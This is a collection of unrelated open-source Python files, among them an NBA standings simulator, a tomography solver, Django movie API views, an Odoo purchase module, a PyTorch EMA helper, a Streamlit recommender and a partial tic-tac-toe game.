end\n\t\t\t\t\t\tf.write(_LSORT[head+nc]+'\\n')\n\t\t\t\t\telse: # Otherwise, just write the team name\n\t\t\t\t\t\tf.write(_LSORT[head+nc]+',')\n\t\t\t\t\n\t\t\t\tfor rows in range(0,_SS_TEAMSPERCONF):\n\t\t\t\t\tf.write(str(rows+1)+',')\n\t\t\t\t\tfor teams in range(0,15):\n\t\t\t\t\t\tif teams == 14:\n\t\t\t\t\t\t\tf.write('{0:.4f}'.format(((_SEEDPOS[_LSORT[teams+nc]][str(rows+1)]/_SS_SIMCNT)*100))+'%\\n')\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tf.write('{0:.4f}'.format(((_SEEDPOS[_LSORT[teams+nc]][str(rows+1)]/_SS_SIMCNT)*100))+'%,')\n\t\t\t\t\n\t\t\t\tfor wins in range(0,_SS_TEAMSPERCONF):\n\t\t\t\t\tif wins == 0:\n\t\t\t\t\t\tf.write('Wins,'+str(_WINTTL[_LSORT[wins+nc]]/_SS_SIMCNT)+',')\n\t\t\t\t\telif wins == 14:\n\t\t\t\t\t\tf.write(str(_WINTTL[_LSORT[wins+nc]]/_SS_SIMCNT)+'\\n')\n\t\t\t\t\telse:\n\t\t\t\t\t\tf.write(str(_WINTTL[_LSORT[wins+nc]]/_SS_SIMCNT)+',')\n\t\t\t\t\n\t\t\t\tfor max in range(_SS_TEAMSPERCONF):\n\t\t\t\t\tif not max:\n\t\t\t\t\t\ta1 = 'Maxima,'\n\t\t\t\t\t\ta2 = ','\n\t\t\t\t\telif max == _SS_TEAMSPERCONF-1:\n\t\t\t\t\t\ta1 = ''\n\t\t\t\t\t\ta2 = '\\n'\n\t\t\t\t\telse:\n\t\t\t\t\t\ta1 = ''\n\t\t\t\t\t\ta2 = ','\n\t\t\t\t\tf.write(a1+str(_MINMAX[_LSORT[max+nc]][1])+a2)\n\t\t\t\t\n\t\t\t\tfor min in range(_SS_TEAMSPERCONF):\n\t\t\t\t\tif not min:\n\t\t\t\t\t\ta1 = 'Minima,'\n\t\t\t\t\t\ta2 = ','\n\t\t\t\t\telif min == _SS_TEAMSPERCONF-1:\n\t\t\t\t\t\ta1 = ''\n\t\t\t\t\t\ta2 = '\\n'\n\t\t\t\t\telse:\n\t\t\t\t\t\ta1 = ''\n\t\t\t\t\t\ta2 = ','\n\t\t\t\t\tf.write(a1+str(_MINMAX[_LSORT[min+nc]][0])+a2)\n\t\t\t\t\n\t\t\t\tf.write('\\n\\n')\n\texcept PermissionError: # Most likely the file is open, preventing it from being written to. Could also be an attrib error. Because data may have been processing for a while, we give an option to retry.\n\t\tprint('\\nThe file appears to be open on your system!')\n\t\tinput('Hit to attempt a re-write, or to cancel.')\n\t\twriteCsv()\n\t\t\n\n# Starts the program if executing from a file.\nif __name__ == '__main__':\n\ttry: # Attempt to import modules. This needs to be done before we even define constants.\n\t\timport configparser\n\t\timport os\n\t\timport sys\n\t\timport time\n\t\timport pytz\n\t\timport urllib\n\t\timport pandas as pd\n\t\tfrom random import random\n\t\tfrom datetime import datetime, timedelta\n\t\t\n\texcept ImportError as error: # A module is missing? 
We can't run the program correctly.\n\t\tprint('\\nUnfortunately, you do not yet support this program, as this module is missing:\\n{}'.format(error.name)) # Inform the user of the missing module\n\t\tprint('\\nPlease enter \"pip install {}\" into your shell to run this program!'.format(error.name)) # Suggest the PIP command to install the module\n\t\t\n\t\texit(1)\n\t\n\t_CONFIG = configparser.ConfigParser() # Instantiate the configparser.\n\t\n\t_CFGFILENAME = 'SimSeason.ini' # The name of the config file.\n\t_CFGDATALOAD = False # Has the config file loaded yet?\n\t\n\t_SS_ALLTEAMIDS = ['ATL','BOS','BRK','CHI','CHO','CLE','DAL','DEN','DET','GSW','HOU','IND','LAC','LAL','MEM','MIA','MIL','MIN','NOP','NYK','OKC','ORL','PHI','PHO','POR','SAC','SAS','TOR','UTA','WAS'] # All team IDs\n\t_SS_CONFERENCE = [0,0,0,0,0,0,1,1,0,1,1,0,1,1,1,0,0,1,1,0,1,0,0,1,1,1,1,0,1,0] # 0 is Eastern Conference, 1 is Western Conference\n\t_SS_DEFAULTSETTINGKEYS = ['_SS_DATASRC','_SS_DATASRCFN','_SS_EXPORT','_SS_SIMCNT','_SS_DODOWNLD','_SS_SHOWOUTPUT','_SS_SHOWPB','_SS_PBCPROG','_SS_PBCCMPT'] # Default setting keys, in case the config file is nonexistent. Do not change for any reason, or the program will fail.\n\t_SS_DEFAULTSETTINGVALS = ['https://projects.fivethirtyeight.com/nba-model/nba_elo.csv','SimSeasonData.csv','SimSeasonOut.csv',1000,True,True,True,'#',' '] # Default setting values, in case the config file is nonexistent. You can manually change these values to specify defaults.\n\t_SS_DIRNAME = os.path.dirname(__file__)+'\\\\' # The running directory\n\t\n\t_SS_TEAMCOUNT = len(_SS_ALLTEAMIDS) # Constant, the amount of teams\n\t_SS_TEAMSPERCONF = int(int(_SS_TEAMCOUNT)/2) # Constant, the amount of teams per conference.\n\t\n\tsetupConfig() # Pull the config data from the INI file.\n\t\n\tif _SS_SHOWOUTPUT: # Only show the intro text if that option is enabled.\n\t\tinitWelcome() # Begin to inform the user what this program does.\n\t\n\tif _SS_DODOWNLD: # Only download new file if specified.\n\t\tupdateDataSrc() # Download the data source from FiveThirtyEight's servers.\n\telse:\n\t\tif not os.path.exists(_SS_DIRNAME+_SS_DATASRCFN):\n\t\t\tprint('\\nNo data source detected. Set DownloadFile to True in the config!')\n\t\t\texit()\n\t\n\t_CSV = pd.read_csv(_SS_DIRNAME+_SS_DATASRCFN) # Open the data source with Pandas. The argument is specified so we can detect unplayed games (NaNs).\n\t\n\t_FIRSTSIMDAY = datetime.now().strftime('%Y-%m-%d') # Sets the first day to simulate games. If CurrentDay is True, start tomorrow. 
If CurrentDay is False, start today.\n\t_CSVLINES = len(_CSV['season'].values.tolist()) # The amount of lines in the data source.\n\t_FGSET = False # Stores if the first game index is set.\n\twhile not _FGSET:\n\t\ttry:\n\t\t\t_FGIDXSIMDAY = (_CSV['date'].values.tolist()).index(_FIRSTSIMDAY) # The index of the first game to simulate.\n\t\texcept ValueError:\n\t\t\t_FIRSTSIMDAY = (datetime.now() - timedelta(days=1)).strftime('%Y-%m-%d') # If date is unassignable, attempt to go back a day.\n\t\telse:\n\t\t\t_FGSET = True\n\t\t\t\n\t_FGIDXSSN = (_CSV['season'].values.tolist()).index(_CSV.iloc[(_CSV['date'].values.tolist()).index(_FIRSTSIMDAY)]['season']) # The index of the first game on the season.\n\t_GAMES2SIM = [] # Stores all the games IDs to simulate\n\t_TEAMWINS = dict() # Stores the current and simulate win record of each team\n\t_SEEDPOS = dict() # Stores each seed frequency for every team\n\t_WINTTL = dict() # Stores the total amount of wins for every team across simulations\n\t_MINMAX = dict() # Stores the minima and maxima of win count across all simulations.\n\t\n\tprint('')\n\t\n\tcreateStorage()\n\t\n\tgames2Sim()\n\t\n\tcurrentWinRecords()\n\t\n\tsimulateIndividualSeason()\n\t\n\tblankFile()\t\t\n\t\n\twriteCsv()\n\t\n\tif _SS_SHOWOUTPUT:\n\t\tif _CFGDATALOAD:\n\t\t\tprint('\\nThanks for using {}!'.format(_SS_NAME))\n\t\telse:\n\t\t\tprint('\\nGoodbye!')\n\t\tprint('\\n(C) 2018-19 Darren R. Skidmore')","repo_name":"darrenrs/nbastandings","sub_path":"SimSeason.py","file_name":"SimSeason.py","file_ext":"py","file_size_in_byte":18566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9482987823","text":"__author__ = 'fabian'\n\nimport numpy as np\nimport IPython\nfrom scipy.sparse import dok_matrix\nfrom scipy.sparse.linalg import lsqr\n\ndef makeA(shape, alphas, num_sensor_pixels=None):\n if num_sensor_pixels is None:\n num_sensor_pixels = int(np.ceil(np.sqrt(shape[0]**2 + shape[1]**2)))\n if num_sensor_pixels % 2 == 0:\n num_sensor_pixels += 1\n\n shape_of_a = (shape[0] * shape[1], len(alphas) * num_sensor_pixels)\n a = np.zeros(shape_of_a)\n center_coordinate = ((shape[0] - 1.) / 2., (shape[1] - 1.) / 2.)\n for al, alpha in enumerate(alphas):\n # IPython.embed()\n sensor_vec = np.array([- 1., np.tan((-alpha)/180.*np.pi)])\n sensor_vec /= np.linalg.norm(sensor_vec)\n if alpha == 90:\n sensor_vec = np.array([-1, 0])\n if alpha == 0:\n sensor_vec = np.array([0, -1])\n first_center_coordinate_sensor = center_coordinate - ((num_sensor_pixels - 1.) / 2.) * sensor_vec\n offset = al * num_sensor_pixels\n for y in xrange(shape[1]):\n for x in xrange(shape[0]):\n tmp = np.array([x, y]) - first_center_coordinate_sensor\n proj = np.dot(tmp, sensor_vec)\n lower_sensor_pixel = np.floor(proj)\n upper_sensor_pixel = np.ceil(proj)\n proportion_lower = 1. - proj % 1\n a[x + y * shape[0], offset + lower_sensor_pixel] += proportion_lower\n if upper_sensor_pixel != lower_sensor_pixel:\n proportion_upper = 1. - proportion_lower\n a[x + y * shape[0], offset + upper_sensor_pixel] += proportion_upper\n return a\n\ndef makeA_jens(shape, alphas, num_sensor_pixels=None):\n\n if num_sensor_pixels is None:\n num_sensor_pixels = int(np.ceil(np.sqrt(shape[0]**2 + shape[1]**2)))\n if num_sensor_pixels % 2 == 0:\n num_sensor_pixels += 1\n\n A = np.zeros((shape[0] * shape[1], len(alphas) * num_sensor_pixels))\n\n for al, alpha in enumerate(alphas):\n\n alpha_rad = alpha / 180. 
* np.pi\n        offset = al * num_sensor_pixels\n\n        for x in xrange(shape[0]):\n            for y in xrange(shape[1]):\n\n                proj = np.cos(alpha_rad) * (x - 0.5*(shape[0]-1) - 0.5*(num_sensor_pixels-1)*(0-np.cos(alpha_rad)))\\\n                    - np.sin(alpha_rad) * (y - 0.5*(shape[1]-1) - 0.5*(num_sensor_pixels-1)*(0+np.sin(alpha_rad)))\n                lower_sensor_pixel = np.floor(proj)\n                upper_sensor_pixel = np.ceil(proj)\n                proportion_lower = 1. - proj % 1\n                A[x + y * shape[0], offset + lower_sensor_pixel] += proportion_lower\n                if upper_sensor_pixel != lower_sensor_pixel:\n                    proportion_upper = 1. - proportion_lower\n                    A[x + y * shape[0], offset + upper_sensor_pixel] += proportion_upper\n\n    return A\n\n\n\n\n\nif __name__ == \"__main__\":\n    image_y = np.load(\"hs_tomography_2/y_77_.npy\")\n    image_alphas = np.load(\"hs_tomography_2/y_77_alphas.npy\").astype(\"float\")\n\n    image_flattened = image_y.flatten()\n    c = np.array([-77,-33,-12, -3,21,42,50,86]).astype(\"float\")\n\n    a = makeA_jens((77,77), image_alphas).transpose()\n\n    import matplotlib.pyplot as plt\n    plt.imshow(a.transpose(), cmap=\"gray\", interpolation=\"none\")\n    plt.close()\n    # plt.show()\n    a_sparse = dok_matrix(a)\n    # lsqr returns a tuple (x, istop, itn, ...); the least-squares solution is its\n    # first element, so index it before reshaping\n    res = lsqr(a_sparse, image_y)[0]\n    res_new = res.reshape((77, 77))\n    plt.imshow(res_new, cmap=\"gray\")\n    plt.show()\n    IPython.embed()\n\n","repo_name":"FabianIsensee/machine_learning_1","sub_path":"ex_5/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"18231134038","text":"# Import string to generate random letters\nimport string\n# Import random for the random bits xd\nimport random\n\n# Import my little helper functions\nfrom funcs import menu\nfrom funcs import inputver as inv\nfrom funcs import mrrobotto1 as rob\n\n\n# Function to repeat the process until the user is satisfied\ndef repeat():\n    lenght, samples = menu.menu()\n\n    contras = rob.genos(lenght, samples)\n    print(\"Generated passwords:\")\n    for i in range(len(contras)):\n        print(''.join(x for x in contras[i]))\n\n    print(f\"\\n\\n Are you happy with these results?\")\n    flag = inv.scanf(input(f\"(-1 to quit, any other number to generate again) \"))\n\n    # If not satisfied, regenerate\n    if flag != -1:\n        return repeat()\n\n\n\n# Main function\nif __name__ == '__main__':\n\n    # Introduction xd\n    print(f\"Hi, welcome to Possegna/Posseñña \\n\\n\")\n\n    # Interact with the good user\n    repeat()\n\n","repo_name":"ErnestoRdS/possegna","sub_path":"possegna.py","file_name":"possegna.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"6072385072","text":"from django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\n# Create your views here.\n\nfrom rest_framework import viewsets\nfrom .serializers import ActorSerializer, MovieSerializer, CategorySerializer\nfrom .models import Actor, Movie, Category\nimport json\nfrom django.http import HttpResponse\n\nclass ActorViewSet(viewsets.ModelViewSet):\n    queryset = Actor.objects.all()\n    serializer_class = ActorSerializer\n\n\nclass MovieViewSet(viewsets.ModelViewSet):\n    queryset = Movie.objects.all()\n    serializer_class = MovieSerializer\n\nclass CategoryViewSet(viewsets.ModelViewSet):\n    queryset = Category.objects.all()\n    serializer_class = 
CategorySerializer\n\nclass CommonActorsAPIView(APIView):\n serializer_class = MovieSerializer\n\n def get(self, request, *args, **kwargs):\n try:\n movies = request.query_params[\"movies\"]\n if movies != None:\n movies = movies.split(sep=',')\n actors = []\n for movie in movies:\n if Movie.objects.filter(title=movie).exists():\n actors=actors+list(Movie.objects.get(title=movie).cast.values_list())\n else:\n content = {'common_actors': 'at least one movie does not exist'}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n result = []\n for actor in actors:\n result.append(Actor.objects.get(pk=actor[0]))\n serializer = ActorSerializer(result, many=True)\n except Exception as e:\n content = {'common_actors': 'movies query parameter does not exist'}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n\n return Response(serializer.data,status=status.HTTP_200_OK)\n\n\nclass PerformancesAPIView(APIView):\n serializer_class = ActorSerializer\n def check_together(self,actors,cast):\n actorsinmovie = []\n for actor in cast:\n actorsinmovie.append(actor[0])\n #check if list1 (movie cast) contains all elements in list2 (actors list)\n return all(elem in actorsinmovie for elem in actors)\n \n def get(self, request, *args, **kwargs):\n try:\n actors = request.query_params[\"actors\"]\n if actors != None:\n actors = actors.split(sep=',')\n for actor in actors:\n if Actor.objects.filter(name=actor).exists():\n pass\n else:\n content = {'performance': 'at least one of the actors does not exist'}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n #movies that those actors have acted.\n movies = Movie.objects.filter(cast__name__in=actors).distinct()\n #movies that those actors have acted together\n movies_all_actors_appear = []\n for mov in movies:\n cast = list(mov.cast.values_list())\n if(self.check_together(actors,cast)):\n movies_all_actors_appear.append(mov)\n serializer = MovieSerializer(movies_all_actors_appear, many=True)\n except Exception as e:\n content = {'performances': 'actors query parameter is not sent'}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n\n return Response(serializer.data,status=status.HTTP_200_OK)\n\n\ndef actorsname(request,name):\n try:\n actors = Actor.objects.filter(name__icontains=name)\n serializer = ActorSerializer(actors, many=True)\n return HttpResponse(json.dumps(serializer.data), content_type='application/json')\n except Exception as e:\n return HttpResponse(str(e), status=status.HTTP_400_BAD_REQUEST)\n\n\ndef moviestitle(request,title):\n try:\n movies = Movie.objects.filter(title__icontains=title)\n serializer = MovieSerializer(movies, many=True)\n return HttpResponse(json.dumps(serializer.data), content_type='application/json')\n except Exception as e:\n \treturn HttpResponse(str(e), status=status.HTTP_400_BAD_REQUEST)\n\ndef moviescategory(request,category):\n try:\n movies = Movie.objects.filter(category__pk=category)\n serializer = MovieSerializer(movies, many=True)\n return HttpResponse(json.dumps(serializer.data), content_type='application/json')\n except Exception as e:\n \treturn HttpResponse(str(e), status=status.HTTP_400_BAD_REQUEST)\n\n\ndef check_together(actors,cast):\n actors = list(map(int, actors))\n actorsinmovie = []\n for actor in cast:\n actorsinmovie.append(actor[0])\n #check if list1 (movie cast) contains all elements in list2 (actors list)\n return all(elem in actorsinmovie for elem in actors)\n\ndef moviescast(request,cast):\n try:\n actors = cast.split(sep='-')\n for actor in 
actors:\n if Actor.objects.filter(pk=actor).exists():\n pass\n else:\n content = {'performance': 'at least one of the actors does not exist'}\n dump = json.dumps(content)\n return HttpResponse(dump, status=status.HTTP_400_BAD_REQUEST)\n movies = Movie.objects.filter(cast__pk__in=actors).distinct()\n movies_all_actors_appear = []\n for mov in movies:\n cast = list(mov.cast.values_list())\n if(check_together(actors,cast)):\n movies_all_actors_appear.append(mov)\n serializer = MovieSerializer(movies_all_actors_appear, many=True)\n return HttpResponse(json.dumps(serializer.data), content_type='application/json')\n except Exception as e:\n \treturn HttpResponse(str(e), status=status.HTTP_400_BAD_REQUEST)","repo_name":"miguelmanzan/geekshubs","sub_path":"back/movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24828412761","text":"\"\"\"\"\"\"\n\n\nfrom celestine.data import (\n code,\n main,\n scene,\n)\nfrom celestine.session.session import SuperSession\nfrom celestine.typed import (\n H,\n N,\n R,\n S,\n)\nfrom celestine.window.container import View\n\n\nclass Session(SuperSession):\n \"\"\"\"\"\"\n\n\n@code\ndef cow(*, say: S, hold: H, **star: R) -> N:\n \"\"\"\"\"\"\n talk = hold.language.DEMO_COW_TALK\n print(talk, say)\n\n\n@main\ndef zero(view: View) -> N:\n \"\"\"\"\"\"\n language = view.hold.language\n with view.span(\"zero_head\") as line:\n line.new(\"zero_title\", text=language.DEMO_ZERO_TITLE)\n line.new(\n \"zero_A\",\n text=language.DEMO_ZERO_ACTION,\n code=\"cow\",\n say=language.DEMO_ZERO_SAY,\n )\n with view.span(\"zero_body\") as line:\n line.new(\"zero_past\", text=language.DEMO_MAIN_PAST, view=\"one\")\n line.new(\"zero_next\", text=language.DEMO_MAIN_NEXT, view=\"two\")\n\n\n@scene\ndef one(view: View) -> N:\n \"\"\"\"\"\"\n language = view.hold.language\n with view.span(\"one_head\") as line:\n line.new(\"one_title\", text=language.DEMO_ONE_TITLE)\n line.new(\n \"one_A\",\n text=language.DEMO_ONE_ACTION,\n code=\"cow\",\n say=language.DEMO_ONE_SAY,\n )\n with view.span(\"one_body\") as line:\n line.new(\"one_past\", text=language.DEMO_ONE_PAST, view=\"zero\")\n line.new(\"one_next\", text=language.DEMO_ONE_NEXT, view=\"two\")\n\n\n@scene\ndef two(view: View) -> N:\n \"\"\"\"\"\"\n language = view.hold.language\n with view.span(\"two_head\") as line:\n line.new(\"two_title\", text=language.DEMO_TWO_TITLE)\n line.new(\n \"two_A\",\n text=language.DEMO_TWO_ACTION,\n code=\"cow\",\n say=language.DEMO_TWO_SAY,\n )\n with view.span(\"two_body\") as line:\n line.new(\"two_past\", text=language.DEMO_TWO_PAST, view=\"one\")\n line.new(\"two_next\", text=language.DEMO_TWO_NEXT, view=\"zero\")\n\n\n# if __spec__.name == \"__main__\":\n# celestine.main(__spec__.origin)\n","repo_name":"mem-dixy/celestine","sub_path":"celestine/application/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"23433758129","text":"from odoo import fields, models, api, _\n\n\nclass PurchaseOrder(models.Model):\n _inherit = \"purchase.order\"\n \n sale_order_id = fields.Many2many(\n 'sale.order',\n string = 'Sale Orders',\n #compute = \"_compute_sale_orders\",\n readonly = False,\n )\n\n sale_orders_counted = fields.Integer(\n \"Sale Order Count\",\n compute='_compute_sale_orders_counted',)\n \n @api.depends(\"sale_order_id\")\n def 
_compute_sale_orders_counted(self):\n        for purchase in self:\n            purchase.sale_orders_counted = len(purchase.sale_order_id)\n\n    \"\"\"@api.depends('order_line.sale_order_id','sale_order_id')\n    def _compute_sale_orders(self):\n        for purchase in self:\n            purchase.sale_order_id = [(4, False)]\n            #search for purchases that reference the sale\n            import pdb;pdb.set_trace()\n            domain = ['|',('id','in',purchase.order_line.sale_order_id.ids)]\n            domain += [('id','in',purchase.sale_order_id.ids)]\n            domain += [('company_id','=',purchase.company_id.id)]\n            sale_ids = self.env['sale.order'].search(domain)\n            purchase.sale_order_id = [(6, 0, sale_ids.ids)]\"\"\"\n\n    def action_view_sale_orders(self):\n        self.ensure_one()\n        # Force active_id to avoid issues when coming from smart buttons\n        # in other models\n        sale_order_ids = self.sale_order_id.ids\n        action = {\n            'res_model': 'sale.order',\n            'type': 'ir.actions.act_window',\n        }\n        if len(sale_order_ids) == 1:\n            action.update({\n                'view_mode': 'form',\n                'res_id': sale_order_ids[0],\n            })\n        else:\n            action.update({\n                'name': _('Sources Sale Orders %s', self.name),\n                'domain': [('id', 'in', sale_order_ids)],\n                'view_mode': 'tree,form',\n            })\n        return action\n\n    def copy_data(self, default=None):\n        if default is None:\n            default = {}\n        default[\"order_line\"] = [\n            (0, 0, line.copy_data()[0])\n            for line in self.order_line.filtered(lambda l: not l.is_deposit)\n        ]\n        return super(PurchaseOrder, self).copy_data(default)\n\n    @api.model\n    def create(self, values):\n        if 'origin' in values and isinstance(values['origin'], str):\n            # Check first whether this purchase comes from a 'sale.order'\n            sale_id = self.env['sale.order'].search([\n                ('name', '=', values['origin'])\n            ], limit=1)\n            if sale_id:\n                values['sale_order_id'] = [(4, sale_id.id)]\n                if sale_id.client_order_ref:\n                    values['origin'] = sale_id.client_order_ref\n            else:\n                # Otherwise check whether this order comes from a route:\n                # find the procurement group and take the sale order from there\n                source_docs = values['origin'].split(',')\n                procure_id = self.env['procurement.group'].search([\n                    ('name', 'in', source_docs)\n                ])\n                # keep the sale order record (not its id) so client_order_ref\n                # can still be read from it below\n                sale_id = procure_id and procure_id.sale_id or None\n                if sale_id:\n                    values['sale_order_id'] = [(4, sale_id.id)]\n                    if sale_id.client_order_ref:\n                        values['origin'] = sale_id.client_order_ref\n\n        return super(PurchaseOrder, self).create(values)\n\nclass PurchaseOrderLine(models.Model):\n    _inherit = \"purchase.order.line\"\n\n    is_deposit = fields.Boolean(\n        string=\"Is a deposit payment\",\n        help=\"Deposit payments are made when creating invoices from a purchase\"\n        \" order. 
They are not copied when duplicating a purchase order.\",\n )\n sale_order_id = fields.Many2one(\n related='sale_line_id.order_id', \n string=\"Sale Order\", \n store=True, readonly=True)\n \n sale_line_id = fields.Many2one(\n 'sale.order.line', \n string=\"Origin Sale Item\", \n index=True, copy=False)\n \n def _prepare_account_move_line(self, move):\n res = super(PurchaseOrderLine, self)._prepare_account_move_line(move)\n if self.is_deposit:\n res[\"quantity\"] = -1 * self.qty_invoiced\n return res\n","repo_name":"ecgroupca/ECGroup","sub_path":"purchase_deposit/models/purchase.py","file_name":"purchase.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"70151367450","text":"# Import libraries\nimport pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import linear_kernel\nfrom scipy.sparse import csr_matrix\nimport streamlit as st\n\n# Load the dataset\nmovies = pd.read_csv(\"movies_metadata.csv\",low_memory=False)\n\n# Drop the rows with missing values\nmovies.dropna(inplace=True)\n\n# Extract the overview column\noverviews = movies[\"overview\"]\n\n# Create a TF-IDF vectorizer object\ntfidf = TfidfVectorizer(stop_words=\"english\")\n\n# Fit and transform the overviews\ntfidf_matrix = tfidf.fit_transform(overviews)\n\n# Compute the cosine similarity matrix for content-based filtering\ncosine_sim_content = linear_kernel(tfidf_matrix, tfidf_matrix)\n\n# Create a pivot table of ratings for collaborative filtering\nratings = pd.read_csv(\"ratings_small.csv\")\nratings_pivot = ratings.pivot(index=\"movieId\", columns=\"userId\", values=\"rating\").fillna(0)\nratings_matrix = csr_matrix(ratings_pivot.values)\n\n# Compute the cosine similarity matrix for collaborative filtering\ncosine_sim_collab = linear_kernel(ratings_matrix, ratings_matrix)\n\n# Create a function to get the title from the index\ndef get_title(index):\n return movies[movies.index == index][\"title\"].values[0]\n\n# Create a function to get the index from the title\ndef get_index(title):\n return movies[movies.title == title].index.values[0]\n\n# Create a function to get the movieId from the title\ndef get_movieId(title):\n return movies[movies.title == title][\"id\"].values[0]\n\n# Create a function to get the recommendations based on the title and the hybrid method\ndef get_recommendations(title, method):\n # Get the index and movieId of the movie\n index = get_index(title)\n movieId = get_movieId(title)\n # Get the similarity scores of all movies with that movie based on the method\n if method == \"content\":\n sim_scores = list(enumerate(cosine_sim_content[index]))\n elif method == \"collab\":\n sim_scores = list(enumerate(cosine_sim_collab[movieId]))\n elif method == \"hybrid\":\n sim_scores = list(enumerate(cosine_sim_content[index] + cosine_sim_collab[movieId]))\n # Sort the movies based on the similarity scores\n sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\n # Get the indices of the 10 most similar movies\n sim_indices = [i[0] for i in sim_scores[1:11]]\n # Get the titles of the 10 most similar movies\n sim_titles = [get_title(i) for i in sim_indices]\n # Return the titles\n return sim_titles\n\n# Create a streamlit app\nst.title(\"Movie Recommendation System\")\n\n# Ask the user for a movie title\nuser_input = st.text_input(\"Enter a movie title:\")\n\n# Ask the user for a recommendation method\nuser_method = 
st.selectbox(\"Select a recommendation method:\", [\"content\", \"collab\", \"hybrid\"])\n\n# Check if the user input is valid\nif user_input in movies[\"title\"].values:\n # Get the recommendations\n recommendations = get_recommendations(user_input, user_method)\n # Display the recommendations\n st.write(f\"Here are 10 movies that are similar to {user_input} using {user_method} method:\")\n for movie in recommendations:\n st.write(movie)\nelse:\n # Display an error message\n st.write(\"Invalid input. Please enter a valid movie title.\")\n","repo_name":"Saurabhh0711/Movie-Recemmondation-System","sub_path":"movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34981258241","text":"from logging import getLogger\n\nfrom torch import nn\n\n\nclass EMA(object):\n \"\"\"Exponential moving average of model parameters.\n\n Ref\n - https://github.com/tensorflow/addons/blob/v0.10.0/tensorflow_addons/optimizers/moving_average.py#L26-L103\n - https://anmoljoshi.com/Pytorch-Dicussions/\n\n Args:\n model (nn.Module): Model with parameters whose EMA will be kept.\n decay (float): Decay rate for exponential moving average.\n strict (bool): Apply strict check for `assign` & `resume`.\n use_dynamic_decay (bool): Dynamically change decay rate. If `True`, small decay rate is\n used at the beginning of training to move moving average faster.\n \"\"\" # NOQA\n\n def __init__(\n self,\n model: nn.Module,\n decay: float,\n strict: bool = True,\n use_dynamic_decay: bool = True,\n ):\n self.decay = decay\n self.model = model\n self.strict = strict\n self.use_dynamic_decay = use_dynamic_decay\n self.logger = getLogger(__name__)\n self.n_step = 0\n\n self.shadow = {}\n self.original = {}\n\n # Flag to manage which parameter is assigned.\n # When `False`, original model's parameter is used.\n # When `True` (`assign` method is called), `shadow` parameter (ema param) is used.\n self._assigned = False\n\n # Register model parameters\n for name, param in model.named_parameters():\n if param.requires_grad:\n self.shadow[name] = param.data.clone()\n\n def step(self):\n self.n_step += 1\n if self.use_dynamic_decay:\n _n_step = float(self.n_step)\n decay = min(self.decay, (1.0 + _n_step) / (10.0 + _n_step))\n else:\n decay = self.decay\n\n for name, param in self.model.named_parameters():\n if param.requires_grad:\n assert name in self.shadow\n new_average = (1.0 - decay) * param.data + decay * self.shadow[name]\n self.shadow[name] = new_average.clone()\n\n # alias\n __call__ = step\n\n def assign(self):\n \"\"\"Assign exponential moving average of parameter values to the respective parameters.\"\"\"\n if self._assigned:\n if self.strict:\n raise ValueError(\"[ERROR] `assign` is called again before `resume`.\")\n else:\n self.logger.warning(\n \"`assign` is called again before `resume`.\"\n \"shadow parameter is already assigned, skip.\"\n )\n return\n\n for name, param in self.model.named_parameters():\n if param.requires_grad:\n assert name in self.shadow\n self.original[name] = param.data.clone()\n param.data = self.shadow[name]\n self._assigned = True\n\n def resume(self):\n \"\"\"Restore original parameters to a model.\n\n That is, put back the values that were in each parameter at the last call to `assign`.\n \"\"\"\n if not self._assigned:\n if self.strict:\n raise ValueError(\"[ERROR] `resume` is called before `assign`.\")\n else:\n self.logger.warning(\"`resume` is called before 
`assign`, skip.\")\n return\n\n for name, param in self.model.named_parameters():\n if param.requires_grad:\n assert name in self.shadow\n param.data = self.original[name]\n self._assigned = False\n","repo_name":"pfnet-research/kaggle-lyft-motion-prediction-4th-place-solution","sub_path":"src/lib/training/exponential_moving_average.py","file_name":"exponential_moving_average.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"31"} +{"seq_id":"13456830582","text":"import math\nimport random\n\n# hem bilgisyar hem de kullanıcıyı tanımlayan bir oyuncu üst sınıfı\nclass Player():\n def __init__(self, letter):\n self.letter = letter\n \n def get_move(self, game):\n pass\n\nclass RandomComputerPlayer(Player):\n def __init__(self, letter):\n # değişiklik yapmak isteyebiliriz. o yüzden init tanımlayalım nolur nolmaz\n super().__init__(letter)\n\n def get_move(self, game):\n choice = random.choice(game.available_moves())\n return choice\n\nclass HumanPlayer(Player):\n def __init__(self, letter):\n super().__init__(letter)\n\n def get_move(self, game):\n valid_choice = False\n val = None\n while not valid_choice:\n choice = input(self.letter + '\\'s turn. Input move (0-8): ')\n try:\n val = int(choice)\n if val not in game.available_moves():\n raise ValueError\n valid_choice = True\n except ValueError:\n print('Invalid choice. Try again.')\n return val\n\n# burada tanımladığımız RandomComputerPlayer sadece rastgele hamleler yapıyor ve genelde\n# kaybediyor. bunu önlemek için minimax adı verilen bir algoritma kullanarak bilgisayarın her\n# zaman en iyi hamleyi yapmasını sağlamak mümkündür.\n\n# minimax kelimesi minimum-maximumdan türemiştir. sıfır kazançlı yani bir tarafın kazanmasının,\n# diğer tarafın 